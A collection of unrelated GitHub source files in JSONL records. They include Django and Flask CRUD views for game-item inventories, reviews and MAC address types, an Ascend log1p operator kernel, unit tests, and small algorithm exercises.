+{"seq_id":"40344508344","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import weapon, order, weapon_order\n\n\n# Create your views here.\ndef home(request):\n all_weapons = weapon.objects.all()\n return render(request, 'Django_Review/Home.html', {'weapons': all_weapons})\n\ndef weapons_inv(request):\n weapon_types = getAllWeaponTypes()\n all_weapons = weapon.objects.all()\n return render(request, 'Django_Review/Inventory.html', {'weapons': all_weapons, 'weapon_types': weapon_types})\n\ndef getAllWeaponTypes():\n\n AMMUNITION = \"AN\"\n FINESSE = \"FE\"\n HEAVY = \"HY\"\n IMPROVISED = \"ID\"\n LIGHT = \"LT\"\n LOADING = \"LG\"\n MARTIAL = \"ML\"\n RANGED = \"RD\"\n REACH = \"RH\"\n SPECIAL = \"SL\"\n THROWN = \"TN\"\n TWOHANDED = \"TD\"\n VERSATILE = \"VE\"\n\n WEAPON_TYPES = {\n \"AN\": 'Ammo',\n \"FE\": 'Fin',\n \"HY\": 'Heavy',\n \"ID\": 'Improv',\n \"LT\": 'Light',\n \"LG\": 'Load',\n \"ML\": 'Martial',\n \"RD\": 'Range',\n \"RH\": 'Reach',\n \"SL\": 'Special',\n \"TN\": 'Thrown',\n \"TD\": 'TwoHand',\n \"VE\": 'Vers'\n }\n \n return WEAPON_TYPES\n\ndef add_weapon(request):\n if(request.method == \"POST\"):\n weap_Name = request.POST.get('weap_Name')\n weap_Price = request.POST.get('weap_Price')\n weap_Type = request.POST.get('weap_Type')\n weap_Stock = request.POST.get('weap_Stock')\n weapon.objects.create(\n weapon_Name = weap_Name,\n weapon_Price = weap_Price,\n weapon_Type = weap_Type,\n weapon_Stock = weap_Stock,\n )\n return redirect('inventory')\n\ndef delete_weapon(request, pk):\n weapon.objects.filter(pk=pk).delete()\n return redirect('inventory')\n\ndef edit_weapon(request,pk):\n \n edit = get_object_or_404(weapon, pk=pk)\n\n e_weapName = request.POST.get('e_weap_Name')\n e_weapPrice = request.POST.get('e_weap_Price')\n e_weapType = request.POST.get('e_weap_Type')\n e_weapStock = request.POST.get('e_weap_Stock')\n print(e_weapName, e_weapPrice, e_weapType, e_weapStock)\n\n edit.weapon_Name = e_weapName\n edit.weapon_Price = e_weapPrice\n edit.weapon_Type = e_weapType\n edit.weapon_Stock = e_weapStock\n edit.save()\n print(str(edit))\n \n # str_edit = str(edit)\n # edited_weapon = str_edit.split('&')\n # for i in edited_weapon:\n # raw_data = i.split(\"=\")\n # FweapName = raw_data[0]\n \n \n return redirect('inventory')\n\ndef subtract_Stock(request, pk, x):\n Main_Stock = weapon.objects.get(pk=pk)\n Subtracted = Main_Stock.weapon_Stock - int(x)\n Main_Stock.weapon_Stock = Subtracted\n Main_Stock.save()\n return Subtracted\n\ndef confirm_order(request):\n if(request.method == \"POST\"):\n ptype = request.POST.get(\"payment_method\")\n weaps = request.POST.get(\"complete_order\")\n total_amt = request.POST.get(\"total_amount\")\n weap_ord = order.objects.create(total_amount_paid=total_amt, payment_type=ptype)\n\n weap_fixed = weaps[:-1]\n stuff = weap_fixed.split(\"-\")\n for it in stuff:\n row_item = it.split(\":\")\n weap_obj = weapon.objects.get(pk=int(row_item[0]))\n subtract_Stock(request, pk=it[0],x=int(row_item[1]))\n itprice = weap_obj.getPrice()\n lt = itprice * int(row_item[1])\n weapon_order.objects.create(weapon_ID =weap_obj, order_ID=weap_ord, line_Total=lt, quantity=row_item[1])\n return redirect('home')\n","repo_name":"Reinigen/Django-Review","sub_path":"Django_Reminder/Django_Review/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8643920956","text":"from functools import reduce as 
functools_reduce\n\nimport te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom te import platform as tbe_platform\nfrom topi import generic\nfrom topi.cce import util\nfrom te.utils.op_utils import *\n\n# define a scalar, value = -1\nSCALAR_NEG_ONE = -1.0\n# define a scalar, value = 1\nSCALAR_ONE = 1.0\n# define taylor negative threshold , value = -1.7\nTAYLOR_NEGATIVE_THRESHOLD = -1.7\n# define taylor positive threshold , value = 0.7\nTAYLOR_POSITIVE_THRESHOLD = 0.7\n# define second order parameter , value = 1 / 2.0\nTAYLOR_SECOND_ORDER_PARAM = 1 / 2.0\n# define third order parameter , value = 1 / 6.0\nTAYLOR_THIRD_ORDER_PARAM = 1 / 6.0\n# define fourth order parameter , value = 1 / 24.0\nTAYLOR_FOURTH_ORDER_PARAM = 1 / 24.0\n# define fifth order parameter , value = 1 / 120.0\nTAYLOR_FIFTH_ORDER_PARAM = 1 / 120.0\n# define sixth order parameter , value = 1 / 720.0\nTAYLOR_SIXTH_ORDER_PARAM = 1 / 720.0\n# define seventh order parameter , value = 1 / 5040.0\nTAYLOR_SEVENTH_ORDER_PARAM = 1 / 5040.0\n\n\n# pylint: disable=locally-disabled,unused-argument,too-many-locals\n@fusion_manager.register(\"log1p\")\ndef log1p_compute(input_x, output_y, kernel_name=\"log1p\"):\n    \"\"\"\n    algorithm: log1p\n    calculating data's log1p, y = log(x + 1)\n    in cloud scene, for all inputs :\n    y = log(x + 1)\n    in mini scene :\n    y(n+1) = y(n) - (e^y(n) - 1 - x(n))/e^y(n)\n    f(y) = e^y(n), y(n) <= TAYLOR_NEGATIVE_THRESHOLD or y(n) >= TAYLOR_POSITIVE_THRESHOLD\n    f(y) = seventh order taylor expansion, TAYLOR_NEGATIVE_THRESHOLD < y(n) < TAYLOR_POSITIVE_THRESHOLD\n\n    Parameters\n    ----------\n    input_x: TVM tensor\n        the placeholder of input_x\n    output_y: dict\n        dict info of output_y\n    kernel_name: str\n        kernel name, default value is \"log1p\"\n\n    Returns\n    -------\n    res: TVM tensor\n        the result of compute\n    \"\"\"\n    dtype = input_x.dtype\n    shape = input_x.shape\n\n    cloud_check = tbe_platform.cce_conf.api_check_support(\"te.lang.cce.vlog\",\n                                                          \"float32\")\n    mini_check = tbe_platform.cce_conf.api_check_support(\"te.lang.cce.vadd\",\n                                                         \"float32\")\n\n    if dtype == \"float16\" and cloud_check:\n        input_x = te.lang.cce.cast_to(input_x, \"float32\")\n\n    data_add = te.lang.cce.vadds(input_x, tvm.const(SCALAR_ONE, \"float32\"))\n    res = te.lang.cce.vlog(data_add)\n\n    if (not cloud_check) and mini_check:\n        input_x = te.lang.cce.cast_to(input_x, \"float32\")\n        res = _log1p_mini_compute(res, input_x, shape)\n\n    if dtype == \"float16\" and (cloud_check or mini_check):\n        res = te.lang.cce.cast_to(res, \"float16\")\n\n    return res\n\n\ndef _log1p_mini_compute(mini_res, input_x, shape):\n    \"\"\"\n    do element-wise log(x + 1) compute in mini scene\n    f(y) = e^y(n), y(n) <= TAYLOR_NEGATIVE_THRESHOLD or y(n) >= TAYLOR_POSITIVE_THRESHOLD\n    f(y) = seventh order taylor expansion, TAYLOR_NEGATIVE_THRESHOLD < y(n) < TAYLOR_POSITIVE_THRESHOLD\n\n    Parameters:\n    ----------\n    mini_res: TVM tensor, the tensor of log(x + 1)\n    input_x : TVM tensor, the placeholder of input_x\n    shape : tuple, the shape of input_x\n\n    Returns : A Tensor. 
Has the same type as mini_res.\n    -------\n    \"\"\"\n    input_y = te.lang.cce.cast_to(mini_res, \"float32\")\n    input_x = te.lang.cce.cast_to(input_x, \"float32\")\n    newton_taylor_res = _newton_taylor_log1p(input_x, input_y)\n    newton_exp_res = _newton_exp_log1p(input_x, input_y)\n\n    input_left_border = tvm.const(TAYLOR_NEGATIVE_THRESHOLD, \"float32\")\n    tensor_input_left_border = te.lang.cce.broadcast(input_left_border, shape)\n\n    input_right_border = tvm.const(TAYLOR_POSITIVE_THRESHOLD, \"float32\")\n    tensor_input_right_border = te.lang.cce.broadcast(input_right_border,\n                                                      shape)\n\n    b_gt_left_border = te.lang.cce.vcmp(input_y,\n                                        tensor_input_left_border, 'gt')\n    exp_taylor_neg = te.lang.cce.vsel(b_gt_left_border, newton_taylor_res,\n                                      newton_exp_res)\n\n    b_lt_right_border = te.lang.cce.vcmp(input_y,\n                                         tensor_input_right_border, 'lt')\n    mini_res = te.lang.cce.vsel(b_lt_right_border, exp_taylor_neg,\n                                newton_exp_res)\n\n    return mini_res\n\n\ndef _exp_taylor_compute(input_x):\n    \"\"\"\n    calculate e^x, use seventh order taylor expansion\n    e^x = 1 + x + (x^2 / 2!) + (x^3 / 3!) + (x^4 / 4!) + (x^5 / 5!) + (x^6 / 6!) + (x^7 / 7!)\n\n    Parameters:\n    ----------\n    input_x : TVM tensor, the placeholder of input_x\n\n    Returns : A Tensor. Has the same type as input_x.\n    -------\n    \"\"\"\n    # calculate second order taylor section : x^2 / 2!\n    taylor_second_order_param = tvm.const(TAYLOR_SECOND_ORDER_PARAM, \"float32\")\n    data_power_2 = te.lang.cce.vmul(input_x, input_x)\n    data_power_2_div_2 = te.lang.cce.vmuls(data_power_2,\n                                           taylor_second_order_param)\n\n    # calculate third order taylor section : x^3 / 3!\n    taylor_third_order_param = tvm.const(TAYLOR_THIRD_ORDER_PARAM, \"float32\")\n    data_power_3 = te.lang.cce.vmul(data_power_2, input_x)\n    data_power_3_div_6 = te.lang.cce.vmuls(data_power_3,\n                                           taylor_third_order_param)\n\n    # calculate fourth order taylor section : x^4 / 4!\n    taylor_fourth_order_param = tvm.const(TAYLOR_FOURTH_ORDER_PARAM, \"float32\")\n    data_power_4 = te.lang.cce.vmul(data_power_3, input_x)\n    data_power_4_div_24 = te.lang.cce.vmuls(data_power_4,\n                                            taylor_fourth_order_param)\n\n    # calculate fifth order taylor section : x^5 / 5!\n    taylor_fifth_order_param = tvm.const(TAYLOR_FIFTH_ORDER_PARAM, \"float32\")\n    data_power_5 = te.lang.cce.vmul(data_power_4, input_x)\n    data_power_5_div_120 = te.lang.cce.vmuls(data_power_5,\n                                             taylor_fifth_order_param)\n\n    # calculate sixth order taylor section : x^6 / 6!\n    taylor_sixth_order_param = tvm.const(TAYLOR_SIXTH_ORDER_PARAM, \"float32\")\n    data_power_6 = te.lang.cce.vmul(data_power_5, input_x)\n    data_power_6_div_720 = te.lang.cce.vmuls(data_power_6,\n                                             taylor_sixth_order_param)\n\n    # calculate seventh order taylor section : x^7 / 7!\n    taylor_seventh_order_param = tvm.const(TAYLOR_SEVENTH_ORDER_PARAM,\n                                           \"float32\")\n    data_power_7 = te.lang.cce.vmul(data_power_6, input_x)\n    data_power_7_div_5040 = te.lang.cce.vmuls(data_power_7,\n                                              taylor_seventh_order_param)\n\n    # calculate first order taylor plus one section : 1 + x\n    res_first_taylor = te.lang.cce.vadds(input_x,\n                                         tvm.const(SCALAR_ONE, \"float32\"))\n    res_second_taylor = te.lang.cce.vadd(res_first_taylor, data_power_2_div_2)\n    res_third_taylor = te.lang.cce.vadd(res_second_taylor, data_power_3_div_6)\n    res_fourth_taylor = te.lang.cce.vadd(res_third_taylor, data_power_4_div_24)\n    res_fifth_taylor = te.lang.cce.vadd(res_fourth_taylor, data_power_5_div_120)\n    res_sixth_taylor = te.lang.cce.vadd(res_fifth_taylor, data_power_6_div_720)\n    res = te.lang.cce.vadd(res_sixth_taylor, data_power_7_div_5040)\n\n    return 
def _newton_exp_iter(input_x, input_y):\n \"\"\"\n do element-wise Newton compute\n y(n+1) = y(n) - (e^y(n) - 1 - x(n))/e^y(n)\n\n Parameters:\n ----------\n input_x: TVM tensor, the placeholder of input_x\n input_y: start value of Newton iteration\n\n Returns : A Tensor. Has the same type as input_y.\n -------\n \"\"\"\n # Newton begin: y(n+1) = y(n) - 1 + e^-y(n) + x(n)*e^-y(n)\n newton_exp = te.lang.cce.vadds(input_y, tvm.const(SCALAR_NEG_ONE,\n \"float32\"))\n input_y_mul = te.lang.cce.vmuls(input_y, tvm.const(SCALAR_NEG_ONE,\n \"float32\"))\n input_y_exp = te.lang.cce.vexp(input_y_mul)\n newton_exp = te.lang.cce.vadd(newton_exp, input_y_exp)\n input_y_res = te.lang.cce.vmul(input_x, input_y_exp)\n newton_exp = te.lang.cce.vadd(newton_exp, input_y_res)\n # Newton end\n return newton_exp\n\n\ndef _newton_taylor_iter(input_x, input_y):\n \"\"\"\n do element-wise Newton compute\n y(n+1) = y(n) - (e^y(n) - 1 - x(n))/e^y(n)\n\n Parameters:\n ----------\n input_x: TVM tensor, the placeholder of input_x\n input_y: start value of Newton iteration\n\n Returns: A Tensor. Has the same type as input_y.\n -------\n \"\"\"\n # Newton begin: y(n+1) = y(n) - 1 + e^-y(n) + x(n)*e^-y(n)\n newton_taylor = te.lang.cce.vadds(input_y, tvm.const(SCALAR_NEG_ONE,\n \"float32\"))\n input_y_mul = te.lang.cce.vmuls(input_y, tvm.const(SCALAR_NEG_ONE,\n \"float32\"))\n input_y_taylor = _exp_taylor_compute(input_y_mul)\n newton_taylor = te.lang.cce.vadd(newton_taylor, input_y_taylor)\n input_y_res = te.lang.cce.vmul(input_x, input_y_taylor)\n newton_taylor = te.lang.cce.vadd(newton_taylor, input_y_res)\n # Newton end\n return newton_taylor\n\n\ndef _newton_exp_log1p(input_x, output_y):\n \"\"\"\n do element-wise Newton compute\n y(n+1) = y(n) - (e^y(n) - 1 - x(n))/e^y(n)\n\n Parameters:\n ----------\n input_x: TVM tensor, the placeholder of input_x\n output_y: TVM tensor, start value of log1p's Newton iteration\n\n Returns: A Tensor. Has the same type as output_y.\n -------\n \"\"\"\n for _ in range(2):\n output_y = _newton_exp_iter(input_x, output_y)\n return output_y\n\n\ndef _newton_taylor_log1p(input_x, output_y):\n \"\"\"\n do element-wise Newton compute\n y(n+1) = y(n) - (e^y(n) - 1 - x(n))/e^y(n)\n\n Parameters:\n ----------\n input_x: TVM tensor, the placeholder of input_x\n output_y: TVM tensor, start value of log1p's Newton iteration\n\n Returns: A Tensor. 
Has the same type as output_y.\n -------\n \"\"\"\n for _ in range(2):\n output_y = _newton_taylor_iter(input_x, output_y)\n return output_y\n\n\n@check_op_params(REQUIRED_INPUT, REQUIRED_OUTPUT, KERNEL_NAME)\ndef log1p(input_x, output_y, kernel_name=\"log1p\"):\n \"\"\"\n algorithm: log1p\n calculating data's log1p, y = log(x + 1)\n\n Parameters\n ----------\n input_x: dict\n shape and dtype of input, only support float16, float32\n output_y: dict\n shape and dtype of output, should be same shape and type as input\n kernel_name: str\n kernel name, default value is \"log1p\"\n\n Returns\n -------\n None\n \"\"\"\n shape = input_x.get(\"shape\")\n dtype = input_x.get(\"dtype\")\n\n check_shape(shape, param_name=\"input_x\")\n\n check_list = (\"float16\", \"float32\")\n input_dtype = dtype.lower()\n check_dtype(input_dtype, check_list, param_name=\"input_x\")\n\n shape = (functools_reduce(lambda x, y: x*y, shape[:]),)\n data_input = tvm.placeholder(shape, name=\"data_input\", dtype=input_dtype)\n res = log1p_compute(data_input, output_y, kernel_name)\n\n with tvm.target.cce():\n sch = generic.auto_schedule(res)\n\n config = {\"name\": kernel_name,\n \"tensor_list\": [data_input, res],\n \"bool_storage_as_1bit\": False}\n te.lang.cce.cce_build_code(sch, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/log1p.py","file_name":"log1p.py","file_ext":"py","file_size_in_byte":11413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72468309608","text":"def asal(n):\r\n p=((n**0.5)//1)\r\n if(n==2):\r\n return(1)\r\n if(n%2==0):\r\n return(0)\r\n i=3\r\n while True:\r\n if(n%i==0 and i!=n):\r\n return(0)\r\n if(i/', AuthorPostAPI.as_view(), name='author_post_api'),\n path('create/', CreatePostAPI.as_view(), name='create_post_api'),\n path('<int:pk>/', SinglePostAPI.as_view(), name='single_post_api'),\n path('<int:pk>/update/', UpdatePostAPI.as_view(), name='update_post_api'),\n path('<int:pk>/delete/', DeletePostAPI.as_view(), name='delete_post_api'),\n path('<int:pk>/comments/', CommentPostAPI.as_view(), name='comments_post_api'),\n]\n","repo_name":"bcaboost/devblog","sub_path":"blogs/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
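[Editorial aside] The angle-bracket converters in the urls.py record above were evidently stripped by HTML-tag removal; `<int:pk>` has been restored from the route names, while the span eaten out of the preceding `asal` record is unrecoverable and left as found. For reference, a hedged sketch of how such converters hand captured values to a view (names here are illustrative, not from the repo):

```python
from django.http import HttpRequest, HttpResponse
from django.urls import path

def single_post(request: HttpRequest, pk: int) -> HttpResponse:
    # the <int:pk> converter matches digits and delivers pk already as an int
    return HttpResponse(f"post {pk}")

urlpatterns = [
    path("<int:pk>/", single_post, name="single_post"),
]
```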
\"mac_address_types/macaddresstype_list.html\"\n\n\nclass MacAddressTypeCreateView(SuccessMessageMixin, LoginRequiredMixin, CreateView):\n model = MacAddressType\n form_class = MacAddressTypeForm\n success_message = 'MacAddressType \"%(name)s\" was created successfully'\n\n def get_initial(self):\n initial = super(MacAddressTypeCreateView, self).get_initial()\n initial[\"created_by\"] = self.request.user\n initial[\"updated_by\"] = self.request.user\n return initial\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n obj.created_by = self.request.user\n obj.updated_by = self.request.user\n obj.save()\n return super(MacAddressTypeCreateView, self).form_valid(form)\n\n\nclass MacAddressTypeUpdateView(SuccessMessageMixin, LoginRequiredMixin, UpdateView):\n model = MacAddressType\n success_message = 'MacAddressType \"%(name)s\" was updated successfully'\n\n form_class = MacAddressTypeForm\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n obj.created_by = self.request.user\n obj.updated_by = self.request.user\n obj.save()\n return super(MacAddressTypeUpdateView, self).form_valid(form)\n\n\nclass MacAddressTypeDetailViev(LoginRequiredMixin, DetailView):\n model = MacAddressType\n fields = \"__all__\"\n\n\nclass MacAddressTypeDeleteView(SuccessMessageMixin, LoginRequiredMixin, DeleteView):\n model = MacAddressType\n success_url = reverse_lazy(\"mac_address_types:list\")\n success_message = 'MacAddressType \"%(name)s\" was deleted successfully'\n\n def post(self, request, *args, **kwargs):\n if \"cancel\" in request.POST:\n url = reverse_lazy(\"mac_address_types:list\")\n return HttpResponseRedirect(url)\n else:\n return super(MacAddressTypeDeleteView, self).post(request, *args, **kwargs)\n\n def form_valid(self, request, *args, **kwargs):\n obj = self.get_object()\n messages.success(self.request, self.success_message % obj.__dict__)\n return super(MacAddressTypeDeleteView, self).delete(request, *args, **kwargs)\n","repo_name":"mherreradsci/django42-tutorial-es","sub_path":"mac_address_types/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"552882468","text":"from pytest import fixture, yield_fixture\nfrom mock import MagicMock, patch\n\nfrom hatak.testing import RequestFixture\nfrom ..helpers import has_access_to_route, ConventWidget\n\n\nclass TestHasAccessToRoute(object):\n\n def test_success(self):\n \"\"\"\n has_access_to_route should run decorated method if use has access to\n route.\n \"\"\"\n method = MagicMock()\n decorator = has_access_to_route('route')\n wrapped = decorator(method)\n obj = MagicMock()\n obj.user.has_access_to_route.return_value = True\n\n result = wrapped(obj, 'arg', kw='kwarg')\n\n method.assert_called_once_with(obj, 'arg', kw='kwarg')\n assert result == method.return_value\n obj.user.has_access_to_route.assert_called_once_with('route')\n\n def test_fail(self):\n \"\"\"\n has_access_to_route should return '' if use has no access to\n route\n \"\"\"\n method = MagicMock()\n decorator = has_access_to_route('route')\n wrapped = decorator(method)\n obj = MagicMock()\n obj.user.has_access_to_route.return_value = False\n\n result = wrapped(obj, 'arg', kw='kwarg')\n\n assert result == ''\n obj.user.has_access_to_route.assert_called_once_with('route')\n\n\nclass TestConventWidget(RequestFixture):\n\n @fixture\n def convent(self):\n return MagicMock()\n\n @fixture\n def widget(self, request, convent):\n return 
+{"seq_id":"552882468","text":"from pytest import fixture\nfrom mock import MagicMock, patch\n\nfrom hatak.testing import RequestFixture\nfrom ..helpers import has_access_to_route, ConventWidget\n\n\nclass TestHasAccessToRoute(object):\n\n def test_success(self):\n \"\"\"\n has_access_to_route should run decorated method if user has access to\n route.\n \"\"\"\n method = MagicMock()\n decorator = has_access_to_route('route')\n wrapped = decorator(method)\n obj = MagicMock()\n obj.user.has_access_to_route.return_value = True\n\n result = wrapped(obj, 'arg', kw='kwarg')\n\n method.assert_called_once_with(obj, 'arg', kw='kwarg')\n assert result == method.return_value\n obj.user.has_access_to_route.assert_called_once_with('route')\n\n def test_fail(self):\n \"\"\"\n has_access_to_route should return '' if user has no access to\n route\n \"\"\"\n method = MagicMock()\n decorator = has_access_to_route('route')\n wrapped = decorator(method)\n obj = MagicMock()\n obj.user.has_access_to_route.return_value = False\n\n result = wrapped(obj, 'arg', kw='kwarg')\n\n assert result == ''\n obj.user.has_access_to_route.assert_called_once_with('route')\n\n\nclass TestConventWidget(RequestFixture):\n\n @fixture\n def convent(self):\n return MagicMock()\n\n @fixture\n def widget(self, request, convent):\n return ConventWidget(request, convent)\n\n @fixture\n def render_for(self, widget):\n with patch.object(widget, 'render_for', autospec=True) as mock:\n yield mock\n\n @fixture\n def ConventDeleteForm(self):\n patcher = patch('konwentor.convent.helpers.ConventDeleteForm')\n with patcher as mock:\n yield mock\n\n @fixture\n def FormWidget(self):\n patcher = patch('konwentor.convent.helpers.FormWidget')\n with patcher as mock:\n yield mock\n\n def test_id(self, widget, convent):\n assert widget.id == convent.id\n\n def test_name(self, widget, convent):\n assert widget.name == convent.name\n\n def test_state(self, convent, widget):\n convent.state = 'running'\n assert widget.state == 'W trakcie'\n\n def test_switch(self, convent, widget, render_for):\n result = widget.switch()\n render_for.assert_called_once_with(\n 'choose_button.jinja2',\n {\n 'url': self.route('convent:choose', obj_id=convent.id)\n }\n )\n assert result == render_for.return_value\n\n def test_edit(self, widget, convent, render_for):\n result = widget.edit()\n render_for.assert_called_once_with(\n 'edit_button.jinja2',\n {\n 'url': self.route('convent:edit', obj_id=convent.id)\n }\n )\n assert result == render_for.return_value\n\n def test_delete(\n self,\n widget,\n convent,\n render_for,\n ConventDeleteForm,\n FormWidget,\n request\n ):\n route = request.route_path\n result = widget.delete()\n\n render_for.assert_called_once_with(\n 'delete_button.jinja2',\n {\n 'url': route('convent:delete', obj_id=convent.id),\n 'form': FormWidget.return_value,\n }\n )\n form = ConventDeleteForm.return_value\n\n assert result == render_for.return_value\n FormWidget.assert_called_once_with(self.request, form)\n ConventDeleteForm.assert_called_once_with(self.request)\n assert route('convent:delete', obj_id=convent.id) == form.action\n\n def test_start_fail(\n self,\n widget,\n convent,\n render_for,\n ):\n convent.is_user_able_to_start.return_value = False\n assert widget.start() == ''\n convent.is_user_able_to_start.assert_called_once_with(\n widget.user)\n\n def test_start_success(self, widget, convent, render_for):\n convent.is_user_able_to_start.return_value = True\n\n result = widget.start()\n\n convent.is_user_able_to_start.assert_called_once_with(\n widget.user)\n\n render_for.assert_called_once_with(\n 'start_button.jinja2',\n {\n 'url': self.route('convent:start', obj_id=convent.id),\n 'convent': widget.convent,\n }\n )\n assert result == render_for.return_value\n\n def test_end_fail(self, widget, convent):\n convent.is_user_able_to_end.return_value = False\n assert widget.end() == ''\n convent.is_user_able_to_end.assert_called_once_with(\n widget.user)\n\n def test_end_success(self, widget, convent, render_for):\n convent.is_user_able_to_end.return_value = True\n\n result = widget.end()\n\n convent.is_user_able_to_end.assert_called_once_with(\n widget.user)\n\n render_for.assert_called_once_with(\n 'end_button.jinja2',\n {\n 'url': self.route('convent:end', obj_id=convent.id),\n }\n )\n assert result == render_for.return_value\n\n def test_ended_warning_false(self, widget, convent):\n convent.state = 'running'\n\n result = widget.ended_warning()\n\n assert result == ''\n\n def test_ended_warning_true(self, widget, convent, render_for):\n convent.state = 'ended'\n\n result = widget.ended_warning()\n\n render_for.assert_called_once_with(\n 'ended_warning.jinja2',\n {}\n )\n assert result == render_for.return_value\n\n def test_row_class_false(self, widget, convent):\n convent.id = 10\n assert widget.row_class(15) == 
''\n\n def test_row_class_true(self, widget, convent):\n convent.id = 10\n assert widget.row_class(10) == 'danger'\n","repo_name":"socek/konwentor","sub_path":"code/src/konwentor/convent/tests/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8794932073","text":"from flask import render_template,redirect,session,request, flash\r\nfrom flask_app import app\r\nfrom flask_app.models.game_review import Reviews\r\nfrom flask_app.models.game import Games\r\nfrom flask_app.models.user import User\r\n\r\n\r\n@app.route('/new/review/<int:id>')\r\ndef new_review(id):\r\n if 'user_id' not in session:\r\n return redirect('/logout')\r\n data = {\r\n \"id\":id,\r\n }\r\n user_data={\r\n \"id\":session[\"user_id\"]\r\n }\r\n return render_template('new_review.html',user=User.get_by_id(user_data),game=Games.get_one(data))\r\n\r\n\r\n@app.route('/create/review',methods=['POST'])\r\ndef create_review():\r\n if 'user_id' not in session:\r\n return redirect('/logout')\r\n if not Reviews.validate_review(request.form):\r\n return redirect('/new/review')\r\n data = {\r\n \"review\": request.form[\"review\"],\r\n \"score\": int(request.form[\"score\"]),\r\n \"user_id\": session[\"user_id\"],\r\n \"game_id\": request.form[\"game_id\"]\r\n }\r\n Reviews.save(data)\r\n return redirect('/dashboard')\r\n\r\n@app.route('/edit/review/<int:id>')\r\ndef edit_review(id):\r\n if 'user_id' not in session:\r\n return redirect('/logout')\r\n data = {\r\n \"id\":id\r\n }\r\n user_data = {\r\n \"id\":session['user_id']\r\n }\r\n return render_template(\"edit_review.html\",review=Reviews.get_one_review(data),user=User.get_by_id(user_data))\r\n\r\n@app.route('/update/review',methods=['POST'])\r\ndef update_review():\r\n if 'user_id' not in session:\r\n return redirect('/logout')\r\n if not Reviews.validate_review(request.form):\r\n return redirect('/new/review')\r\n data = {\r\n \"review\": request.form[\"review\"],\r\n \"score\": int(request.form[\"score\"]),\r\n \"user_id\": session[\"user_id\"],\r\n \"game_id\": request.form[\"game_id\"],\r\n # \"id\": request.form[\"game_id\"]\r\n }\r\n Reviews.update(data)\r\n return redirect('/dashboard')\r\n\r\n@app.route('/review/<int:id>')\r\ndef show_review(id):\r\n if 'user_id' not in session:\r\n return redirect('/logout')\r\n data = {\r\n \"game_id\":id\r\n }\r\n user_data = {\r\n \"id\":session['user_id']\r\n }\r\n return render_template(\"show_reviews.html\",reviews=Reviews.get_all_reviews_with_users(data),user=User.get_by_id(user_data))\r\n\r\n@app.route('/destroy/review/<int:id>')\r\ndef destroy_review(id):\r\n if 'user_id' not in session:\r\n return redirect('/logout')\r\n data = {\r\n \"id\":id\r\n }\r\n Reviews.destroy(data)\r\n return redirect('/dashboard')","repo_name":"kashley90/GameReviewProject","sub_path":"GoodOrNotGames!/flask_app/controllers/game_reviews.py","file_name":"game_reviews.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
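Every handler in the Flask record above repeats the same `if 'user_id' not in session` guard; a decorator removes the duplication. A sketch (the decorator name is ours, not from the repo):

```python
from functools import wraps
from flask import redirect, session

def login_required(view):
    @wraps(view)
    def wrapped(*args, **kwargs):
        # same behaviour as the inline checks: bounce to /logout to clear state
        if 'user_id' not in session:
            return redirect('/logout')
        return view(*args, **kwargs)
    return wrapped

# usage: stack under @app.route(...)
# @app.route('/dashboard')
# @login_required
# def dashboard(): ...
```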
+{"seq_id":"73953984489","text":"\nfrom treeNode import TreeNode\n\n\ntreeNode = TreeNode(3)\ntreeNode.left = TreeNode(9)\ntreeNode.right = TreeNode(20)\ntreeNode.right.left = TreeNode(15)\ntreeNode.right.right = TreeNode(7)\n\n\nfrom collections import deque\n\n# O(n) time || O(w) space, w = max level width held in the queue\ndef zigZagLevelOrder(root):\n if not root:\n return root\n\n result = []\n queue = deque([root])\n depth = 0\n while queue:\n newLevel = []\n for _ in range(len(queue)):\n currNode = queue.popleft()\n newLevel.append(currNode.value)\n if currNode.left:\n queue.append(currNode.left)\n if currNode.right:\n queue.append(currNode.right)\n\n result += [newLevel] if depth % 2 == 0 else [newLevel[::-1]]\n depth += 1\n\n return result\n\nprint(zigZagLevelOrder(treeNode))","repo_name":"ArshErgon/Leetcode-Question-Solution","sub_path":"LeetCode/tree/BinaryTreeZigzagLevelOrderTraversal.py","file_name":"BinaryTreeZigzagLevelOrderTraversal.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36953316864","text":"with open('./answers.txt') as file:\r\n data = file.readlines()\r\n\r\ndata = [x.replace('\\n',\"\") for x in data]\r\n\r\ncounter = 0\r\nclean_data=[]\r\nentry = ''\r\nfor i in range(len(data)):\r\n entry = entry+data[i]\r\n if data[i]=='' or counter== len(data)-1:\r\n clean_data.append(entry)\r\n entry = ''\r\n counter+=1\r\n\r\n##puzzle in a one liner##\r\ntotal = sum([len(set(answers)) for answers in clean_data])\r\nprint(total)","repo_name":"gustojvalle/AdventOfCode2020","sub_path":"AdventOfCode6.1.py","file_name":"AdventOfCode6.1.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
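The blank-line bookkeeping in the Advent of Code record above is the error-prone part; splitting the raw text on double newlines gives the same per-group unique-answer count in two lines. A sketch with inline data standing in for answers.txt:

```python
raw = "abc\n\na\nb\nc\n\nab\nac"  # three groups, in the puzzle's format

groups = [g.replace("\n", "") for g in raw.split("\n\n")]
print(sum(len(set(g)) for g in groups))  # 3 + 3 + 3 = 9
```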
